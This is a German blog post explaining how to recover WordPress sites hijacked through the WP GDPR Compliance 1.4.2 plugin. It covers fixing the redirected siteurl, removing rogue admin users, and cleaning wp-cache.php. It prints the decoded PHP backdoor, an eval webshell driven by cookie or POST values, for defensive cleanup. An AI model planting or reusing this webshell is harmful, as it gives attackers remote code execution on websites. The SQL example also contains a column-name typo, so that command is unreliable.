Skip to main content

erealitatea hack beim WordPress DSGVO Plugin WP GDPR Compliance Plugin

Wer das WordPress Plugin „WP GDPR Compliance“ Tool installiert hat, der sollte unbedingt mal die Version prüfen. Die Version 1.4.2 enthält nämlich eine schwere Sicherheitslücke, sodass Angreifer ohne weiteres in eure Installation eindringen können. So konnte ich bei 2 meiner Blogs nicht mehr einloggen und die WeiterleitungsURL im Backend sah komisch aus. Die Weiterleitung war auf erealitatea[.]net Seite umgestellt.

Das WP GDPR Compliance Plugin ist auf über 100.000 WordPress Installationen am laufen und bietet den Angreifern somit eine gute Beute, wenn diese erlegt wurde. Bei meinen Blogs habe ich auch einen htaccess, bzw einen .htpasswd Schutz, doch das bringt nichts, da sie durch die Hintertür bei dem WP GDPR Compliance Plugin sich Zugriff verschaffen.

Wann weiß ich, dass meine Webseite gehackt wurde?

Das weißt du dann, wenn du auf domain.tld/wp-admin navigierst und auf die erealitatea weitergeleitet wirst und somit nicht mehr in dein Backend kommst. Oder natürlich auch, wenn deine Seite nicht mehr funktioniert oder dort etwas anderes vorzufinden ist, als du es eigentlich gewohnt bist.

 

WordPress Seite gehackt, was tun?

Bereits sind über 5000 Einträge für „erealitatea[.]net in den Google Suchergebnissen zu finden, Tendenz steigend. Wenn du festgestellt hast, dass du von dem Hackerangriff betroffen bist, dann solltest du dich auf jeden Fall darum kümmern, dies so schnell wie möglich zu bereinigen, bevor noch mehr passiert. Die nachfolgenden Schritte können dir helfen, deine Webseite von diesem Hack zu bereinigen.

Seiten URL ändern

Wenn du also von diesem Angriff betroffen bist und deine Seite somit gehackt worden ist, kannst du das mit einigen Handgriffen lösen. Als erstes solltest du dich in deine Datenbank einloggen. Das geht, wenn du dich bei deinem Hostinganbieter einloggst und den PHPMyAdmin startest. Bei All-inkl* meldest du dich im KAS an, gehst auf Datenbanken und findest dann rchts dieses Symbol wie in der Grafik eingezeichnet.

phpmyadmin all-inkl

 

Wähle eine Version aus (ich nehme gerne die Version 4), dann bist du in PHPMyAdmin drin und somit in deiner Datenbank. Diese gemacht Änderung versteckt sich in wp_options. Das heißt, du scrollst nun in dem Hauptfenster deiner Datenbank soweit nach unten, bis du wp_options siehst.

wp-options

Hast du noch einen Prefix davor, z. B. „tada“ oder sonstiges, weil du es bei der Installation gewählt hast, dann ist davor noch ein Prefix, aber das stört ja nicht. Nun klicke auf diesen Eintrag mit wp_options und du wirst weitergeleitet zu den eingetragenen Optionen in diesem Teil der Datenbank, bzw. in dieser Datenbanktabelle. Dann ist hier der erste Eintrag gleich der Richtige. Wenn du hier betroffen bist, dann siehst du bei 1. siteurl den Eintrag unter option_value „erealitatea[.]net“. Diesen änderst du wieder auf deinen Eintrag, z. B. https://www.seo-tech.de (siehe Grafik) und bestätigst diese Änderung mit „speichern“.

wp-options tabelle

Nun sollte dein Backend wieder normal funktionieren und du kannst dich einloggen. Du kannst dich nun aus PHPMyAdmin ausloggen (kleines Exit Symbol links oben).

Du kannst das anstelle des manuellen Eingriffst auch automatisiert machen, indem du diesen SQL Query absetzt:

UPDATE `wp_options` SET option_vaue = 'https://www.deine-domain' WHERE option_name = 'siteurl';

Dabei musst du selbst wissen, ob deine Domain mit oder ohne „www“ aufgerufen wird.

Du kannst anstatt in der DB rumzufrickeln auch einen anderen Weg einschlagen und dem Rootverzeichnis deiner WordPress Installation die Datei wp_config.php suchen. Diese machst du mit einem Editor deines Vertrauens auf und fügst die folgenden Zeilen ganz am Anfang nach dem „<?php“ ein:

define( 'WP_HOME', 'https://deine-domain' );

define( 'WP_SITEURL', 'https://deine-domain' );

Speichere diese Datei und lade sie wieder in dein WordPress Installationsverzeichnis auf deinem FTP Server hoch. Nun solltest du noch unter Einstellungen -> Allgemein die SiteURL checken ob hier weiterhin deine URL drinsteht. Wenn ja, alles gut, wenn nicht, bitte gleich ändern.

Fremde User entfernen

Dann solltest du dich nochmal ins Backend begeben. Und wenn du nun im Backend angelangt bist, solltest du bevor du irgendetwas tust, nochmal nachsehen, ob du ungebetene Gäste im Hause hast. Dazu gehst du in WordPress Backend links auf der Seite auf das Feld Benutzer und suchst dort den Navigationspunkt „Alle Benutzer“:

WordPress alle benutzer

Jetzt solltest du hoffentlich nur deinen Adminbenutzer und die von dir erstellten User sehen. Wenn du mehr als nur deinen Adminuser siehst und zwar die Folgenden:

  • superuser
  • t2trollherten
  • t3trollherten

dann solltest du diese auf jeden Fall entfernen.

wp-cache.php Datei checken

Des Weiteren solltest du deine wp-cache.php Datei checken (sofern vorhanden). Diese findest du ebenfalls in deinem WordPress Installationsverzeichnis (root). Wenn diese Datei befallen ist, dann sollte es wie folgt aussehen:

befallene wp cache datei

 

Dekodiert liest es sich:

<?php

function cookie_or_request($_0){

return isset($_COOKIE[$_0]) ? $_COOKIE[$_0] : @$_POST[$_0];

}

$rce = cookie_or_request('jweyc') . cookie_or_request('aeskoly') . cookie_or_request('owhggiku') . cookie_or_request('callbrhy');

if(!empty($rce)){

$rce = str_rot13(pack('H*', strrev($rce)));

if(isset($rce)){

@eval($rce);

exit();

}

}

(Credits gehen an sucuri.net).

Diese Datei würde nun einen Schadcode beinhalten, sodass sich die Angreifer auch dann wieder Zugriff verschaffen würden, wenn du das Plugin updated und den Datenbankeintrag gerade gebogen hast. Dieser Teil sollte aus der Datei gelöscht werden oder gar die gesamte Datei.

 

Passwort ändern

Über eine Änderung des Passworts zur WP Installation (Backend Login) sollte ebenfalls nachgedacht werden und wäre anzuraten. Hast du eine automatische Installation, bzw. Update der Plugins erlaubt und somit deine FTP Credentials hinterlegt, solltest du dir sicherheitshalber überlegen, ob du dieses Passwort nicht auch ändern möchtest, gerade, wenn du eine befallene wp-cache.php Datei hast.

 

WP GDPR Compliance Tool updaten

Nachdem alles hoffentlich sauber ist, solltest du das WP GDPR Compliance Plugin auf jeden Fall auf die Version 1.4.3 updaten.

 

Wie kann man sich gegen solche Angriffe schützen?

Hier kannst du eine Web Application Firewall (WAF) nutzen, da gibt es einige kostenlose und kostenpflichtige Versionen, die du dir als Plugin installieren kannst. Zum Beispiel

  • Wordfence
  • Sucuri
  • Cloudflare
  • SiteLock
  • BulletProof Security

und einige mehr. Des Weiteren solltest du schauen, dass du die Updates möglichst schnell installierst und immer Backups machst. Dazu kannst du das Plugin „BackUpWordPress“ verwenden und dir so dein Backup auf z. B. jede Woche stellen, je nachdem wie oft du was änderst. Und schaue, dass du möglichst nur die PlugIns installierst und aktivierst, die du auch wirklich brauchst. Denn jedes Plugin hat auch den Nachteil, dass es die Performance, also die Ladezeit der Webseite negativ beinflussen kann (außer bei Caching Plugins).

 

Ich würde mich sehr freuen, wenn du meine Zeit und Arbeit würdigst und den Beitrag teilst. Es ist nur ein kleiner Klick für dich, aber eine große Hilfe für mich.

Du willst mehr Sichtbarkeit und geilen Content?

Mehr Sichtbarkeit durch geilen Content und Content Marketing. Analyse deine Rankings, optimiere die Schwächen deiner Website und erhalte kostenlos und unverbindlich einen SEO-Check für deine Website. Prüfe, wie sich dein Content schlägt und optimiere ihn mit der Content Suite.

Loslegen, analysieren, optimieren, dominieren!*

Du willst mehr Sichtbarkeit in den Suchmaschinen?

Dann analysiere deine Rankings, optimiere die Schwächen deiner Website und erhalte kostenlos und unverbindlich einen SEO-Check für deine Website. Mache auch eine schnelle WDF*IDF-Analyse und prüfe deinen Content auf duplicate Content.

Jetzt kostenlos einen SEO-Check machen!*

Sponsor: Clixado

Hochwertige Backlinks kaufen

Durch Kooperationen mit unzähligen und unabhängigen Seitenbetreibern stehen uns über 4000 Blogs und Magazine zu verschiedenen Themen zur Verfügung, auf denen wir Artikel mit einem DoFollow Link zu deiner Seite veröffentlichen können.

  • Kein SEO-Netzwerk, verschiedene Seiteninhaber (kein PBN! oder ähnliches)
  • Keine abgestraften oder blackisted Seiten
  • Unterschiedliche Qualitäts- und Preisklassen
  • Einmalzahlung, keine laufenden Kosten

Jetzt kostenlos und unverbindlich Beispiele anfordern



Ähnliche Beiträge



Keine Kommentare vorhanden


Du hast eine Frage oder eine Meinung zum Artikel? Teile sie mit uns!

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *